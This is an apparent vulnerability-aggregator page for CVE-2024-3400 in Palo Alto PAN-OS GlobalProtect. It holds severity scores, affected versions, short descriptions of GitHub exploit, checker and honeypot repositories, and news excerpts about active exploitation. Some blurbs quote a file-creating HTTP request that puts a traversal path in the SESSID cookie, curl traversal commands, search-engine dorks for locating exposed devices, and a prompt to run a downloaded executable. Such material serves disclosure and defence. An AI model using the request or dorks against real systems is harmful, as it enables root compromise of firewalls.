CVE-2024-3400

Published: 12/04/2024 Updated: 23/04/2024
CVSS v3 Base Score: 10 | Impact Score: 6 | Exploitability Score: 3.9
VMScore: 0

Vulnerability Summary

A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated malicious user to execute arbitrary code with root privileges on the firewall. Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.

Vulnerable Product

paloaltonetworks pan-os 10.2.7

paloaltonetworks pan-os 10.2.2

paloaltonetworks pan-os 10.2.6

paloaltonetworks pan-os 10.2.5

paloaltonetworks pan-os 10.2.3

paloaltonetworks pan-os 10.2.4

paloaltonetworks pan-os 10.2.1

paloaltonetworks pan-os 10.2.0

paloaltonetworks pan-os 10.2.9

paloaltonetworks pan-os 11.1.1

paloaltonetworks pan-os 11.0.2

paloaltonetworks pan-os 11.1.0

paloaltonetworks pan-os 11.1.2

paloaltonetworks pan-os 11.0.4

paloaltonetworks pan-os 11.0.3

paloaltonetworks pan-os 11.0.0

paloaltonetworks pan-os 11.0.1

Exploits

Palo Alto OS was recently hit by a command injection zero day attack. These are exploitation details related to the zero day ...
This Metasploit module exploits two vulnerabilities in Palo Alto Networks PAN-OS that allow an unauthenticated attacker to create arbitrarily named files and execute shell commands. Configuration requirements are PAN-OS with GlobalProtect Gateway or GlobalProtect Portal enabled and telemetry collection on (default). Multiple versions are affected ...
Palo Alto PAN-OS versions prior to 11.1.2-h3 command injection and arbitrary file creation exploit ...

GitHub Repositories

GlobalProtect Palo Alto File Write Exploit

CVE-2024-3400 CVE-2024-3400 Palo Alto File Write Exploit /gp-exploitsh file_name_to_write urlstxt

PAN-OS Firewall Exploit Script: This script is designed to demonstrate the exploitation of vulnerabilities in PAN-OS firewalls. It sends a specially crafted payload to the firewall's API endpoint to execute arbitrary commands. This exploit specifically targets CVE-2024-3400, a command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software

CVE-2024-3400: OS Command Injection Vulnerability in GlobalProtect Gateway Severity: CRITICAL (10/10) ⚠️

A simple bash script to check for evidence of compromise related to CVE-2024-3400

CVE-2024-3400_compromise_checker A simple bash script to check for evidence of compromise related to CVE-2024-3400

CVE-2024-3400

A simple bash script to check for evidence of compromise related to CVE-2024-3400

CVE-2024-3400 Compromise Checker: A very simple bash script to check for evidence of compromise related to CVE-2024-3400 on Palo Alto Firewalls. Designed to provide a quick initial triage of potentially impacted devices by checking for the existence of artefacts outlined in the Volexity writeup and deFroggy's blog post. Usage: ./cve-2024-3400_checker.sh For more detailed in

CVE-2024-3400 POC Remote Code Execution (RCE) Palo Alto Networks PAN-OS software

CVE-2024-3400-POC CVE-2024-3400 POC Remote Code Execution (RCE) Palo Alto Networks PAN-OS software Date of published 2024/04/12 🔥 CVSS: 98/10 Description A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbit

CVE-2024-3400 Checker

CVE-2024-3400 Vulnerability Checker. Description: CVE-2024-3400 represents a critical command injection vulnerability in several versions of PAN-OS, the operating system for Palo Alto Networks firewalls. This vulnerability, rated CVSS 10, allows unauthenticated attackers to execute arbitrary code with root privileges. It affects PAN-OS versions 10.2, 11.0, and 11.1 under specific

repository containing some nmap scripts

nmap-scripts: repository containing some nmap scripts. Download the script to the script folder "C:\Program Files (x86)\Nmap/scripts/" on Windows or /usr/share/nmap/scripts/ on some Linux. Don't forget to update the db if you want the script to be registered as exploit category, for example: nmap --script-updatedb. CVE-2024-3400 PANOS - GlobalProtect RCE Testing ETag v

CVE-2024-3400: This script is a simple tool for exploiting vulnerable PAN-OS firewalls. It allows users to perform attacks against vulnerable PAN-OS firewalls by injecting custom payloads into them. The script can be run by entering values directly or by using a CSV file containing a list of targets. Usage: Running the Script with Direct Values: Make sure you have Python 3.x in

Palo Alto vulnerability

Vulnerability CVE-2024-3400. Description: The CVE-2024-3400 vulnerability is a security vulnerability that affects PAN-OS firewalls in versions 10.2, 11.0 and 11.1. This vulnerability is exploited when the GlobalProtect gateway and device telemetry configurations are enabled. An attacker can take advantage of this vulnera

A check program for CVE-2024-3400, Palo Alto PAN-OS unauthenticated command injection vulnerability.

CVE-2024-3400-Checker A check program for CVE-2024-3400, Palo Alto PAN-OS unauthenticated command injection vulnerability

CVE-2024-3400-RCE

CVE-2024-3400 CVE-2024-3400

CVE-2024-3400 Palo Alto OS Command Injection

CVE-2024-3400 CVE-2024-3400 Palo Alto OS Command Injection send this HTTP request: POST /ssl-vpn/hipreportesp HTTP/11 Host: 127001 Cookie: SESSID=////var/appweb/sslvpndocs/global-protect/portal/images/hellome1337txt; Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0 you will create hellome1337

CVE-2024-3400 RCE Test Script. Overview: This Python script is designed to test for a remote code execution (RCE) vulnerability, specifically CVE-2024-3400, which affects certain Palo Alto Networks GlobalProtect portals. The vulnerability allows unauthorized command execution via cookie manipulation. The script sends a benign HTTP GET request to a list of specified URLs with a co

CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect

CVE-2024-3400 CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect

CVE-2024-3400-RCE

Lightly modified from githubcom/W01fh4cker/CVE-2024-3400-RCE for batch RCE testing. Reference: labswatchtowrcom/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/ For testing only; I take no responsibility for illegal testing.

Have we not learnt from HoneyPoC?

CVE-2024-3400-Canary Have we not learnt from HoneyPoC? Usage Point script at host: python3 Pocpy <host>

Simple POC for CVE-2024-3400

cve-2024-3400-poc Simple POC for CVE-2024-3400 based on the article labswatchtowrcom/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/

CVE-2024-3400 : Palo Alto OS Command Injection - POC

CVE-2024-3400 CVE-2024-3400 : Palo Alto OS Command Injection - POC. Disclaimer: This is just a POC - I've decided not to include the exploit in this repository

Simple Python code to check for arbitrary uploading

CVE-2024-3400 Simple Python code to check for arbitrary uploading

Python script to check Palo Alto firewalls for CVE-2024-3400 exploit attempts

Firewall CVE-2024-3400 Checker. Overview: This script checks for evidence of the CVE-2024-3400 PAN-OS exploit on Palo Alto Networks firewalls. Requirements: Python 3.6+, netmiko library, tqdm library. Installation: Clone the repository: git clone githubcom/swaybs/CVE-2024-3400git Navigate to the project directory: cd cve-2024-3400 Install the dependencies using pip: pip i

Finding Palo Alto devices vulnerable to CVE-2024-3400.

CVE-2024-3400 Finding Palo Alto devices vulnerable to CVE-2024-3400 options: -h, --help show this help message and exit -r IP, --ip IP IP address for single request -R FILE, --file FILE File path containing list of IP addresses

A Gorilla Session Vulnerable to Path Directory Traversal export SESSION_KEY=gorilla go run escapezoogo Path Directory Traversal curl --cookie "zoo=$PREFIX/tmp" localhost:8080 curl --cookie "zoo=$HOME/" localhost:8080

CVE-2024-3400 POC written in Rust and Python

CVE-2024-3400 CVE-2024-3400 POC written in Rust and Python

Python exploit and checker script for CVE-2024-3400 Palo Alto Command Injection and Arbitrary File Creation

cve-2024-3400 Python exploit and checker script for CVE-2024-3400 Palo Alto Command Injection and Arbitrary File Creation usage: cve-2024-3400py [-h] {exploit,check} CVE-2024-3400 - Palo Alto OS Command Injection positional arguments: {exploit,check} Available modules exploit Exploit module of script check Vulnerability check module of script

Gorilla_Sessions Vulnerability related to cve-2024-3400 The following links below are a compilation of the CVE-2024-3400 vulnerability, supposedly affected by the gorilla/sessions library, which allows a traversal path via the cookie Attached are 2 listings where you can find all the repositories and packages with dependencies on the library Pull request gorilla/sessions Searc

CVE-2024-3400-RCE

Cyberspace Mapping Dork Fofa app="paloalto-GlobalProtect" enfofainfo/result?qbase64=YXBwPSJwYWxvYWx0by1HbG9iYWxQcm90ZWN0Ig%3D%3D Zoomeye app:"Palo Alto Networks firewall httpd" wwwzoomeyehk/searchResult?q=app%3A%22Palo%20Alto%20Networks%20firewall%20httpd%22&a

Exploit for CVE-2024-3400

CVE-2024-3400 Description Simple Python code to check for arbitrary uploading to a PaloAlto Exploit for CVE-2024-3400 Go To Releases And Download The Archive Run The Compressedexe install python pip install -r requirementstxt Simply Run: python3 exploit-Finalpy -i ip Enjoy :D Download githubcom/stronglier/CVE-2024-3400/releases/tag/CVE-2024-3400

Check to see if your Palo Alto firewall has been compromised by running script against support bundle.

Palo Vulnerability Check - CVE-2024-3400. Overview: This script is designed to check for signs of compromise in Palo systems, specifically for the vulnerability identified as CVE-2024-3400. It searches through tar.gz archive files for specific log entries that may indicate a security breach. Prerequisites: Python 3.x; access to the tar.gz file containing Palo logs. Usage: Ensur

Simple honeypot for CVE-2024-3400 Palo Alto PAN-OS Command Injection Vulnerability

CVE-2024-3400-pot Simple honeypot for CVE-2024-3400 Palo Alto PAN-OS Command Injection Vulnerability

Exploit for GlobalProtect CVE-2024-3400

CVE-2024-3400 Exploit for GlobalProtect CVE-2024-3400

Recent Articles

22,500 Palo Alto firewalls "possibly vulnerable" to ongoing attacks
BleepingComputer • Bill Toulas • 19 Apr 2024

Approximately 22,500 exposed Palo Alto GlobalProtect firewall devices are likely vulnerable to the CVE-2024-3400 flaw, a critical command injection vulnerability that has been actively exploited in attacks since at least March 26, 2024. CVE-2024-3400 is a critical vulnerability impacting specific Palo Alto Networks' PAN-OS versions in the GlobalProtect feature that allows unauth...

Exploit released for Palo Alto PAN-OS bug used in attacks, patch now
BleepingComputer • Sergiu Gatlan • 16 Apr 2024

Exploit code is now available for a maximum severity and actively exploited vulnerability in Palo Alto Networks' PAN-OS firewall software. Tracked as CVE-2024-3400, this security flaw can let unauthenticated threat actors execute arbitrary code as root via command injection in low-complexity attacks on vulnerable PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls if the device telemet...

Palo Alto Networks fixes zero-day exploited to backdoor firewalls
BleepingComputer • Sergiu Gatlan • 15 Apr 2024

Palo Alto Networks has started releasing hotfixes for a zero-day vulnerability that has been actively exploited since March 26th to backdoor PAN-OS firewalls. This maximum severity security flaw (CVE-2024-3400) affects PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls with device telemetry and GlobalProtect (gateway or portal) enabled. Unauthenticated threat actors can exploit it r...

Palo Alto Networks zero-day exploited since March to backdoor firewalls
BleepingComputer • Lawrence Abrams • 13 Apr 2024

Suspected state-sponsored hackers have been exploiting a zero-day vulnerability in Palo Alto Networks firewalls tracked as CVE-2024-3400 since March 26, using the compromised devices to breach internal networks, steal data and credentials. Palo Alto Networks warned yesterday that hackers were actively exploiting an unauthenticated remote code execution vulnerability in its PAN-OS ...

Palo Alto Networks warns of PAN-OS firewall zero-day used in attacks
BleepingComputer • Bill Toulas • 12 Apr 2024

Today, Palo Alto Networks warns that an unpatched critical command injection vulnerability in its PAN-OS firewall is being actively exploited in attacks. "Palo Alto Networks is aware of a limited number of attacks that leverage the exploitation of this vulnerability," warns the Palo Alto security bulletin. The flaw, which has been discovered by Volexity and is tracked as CVE-2024-3400, i...

Zero-day exploited right now in Palo Alto Networks' GlobalProtect gateways
The Register

Out of the PAN-OS and into the firewall, a Python backdoor this way comes

Palo Alto Networks on Friday issued a critical alert for an under-attack vulnerability in the PAN-OS software used in its firewall-slash-VPN products. The command-injection flaw, with an unwelcome top CVSS severity score of 10 out of 10, may let an unauthenticated attacker execute remote code with root privileges on an affected gateway, which to put it mildly is not ideal. It can, essentially, be exploited to take complete control of equipment and drill into victims' networks. Updates to fully f...

Exploit code for Palo Alto Networks zero-day now public
The Register

Race on to patch as researchers warn of mass exploitation of directory traversal bug

Various infosec researchers have released proof-of-concept (PoC) exploits for the maximum-severity vulnerability in Palo Alto Networks' PAN-OS used in GlobalProtect gateways. The PoCs started rolling out just a day after the vendor began releasing hotfixes for the issue on Monday. Researchers have echoed previous warnings about how easy the vulnerability is to use in attacks, and said that many organizations could be compromised as a result. Cybersecurity biz watchTowr Labs was the first to rele...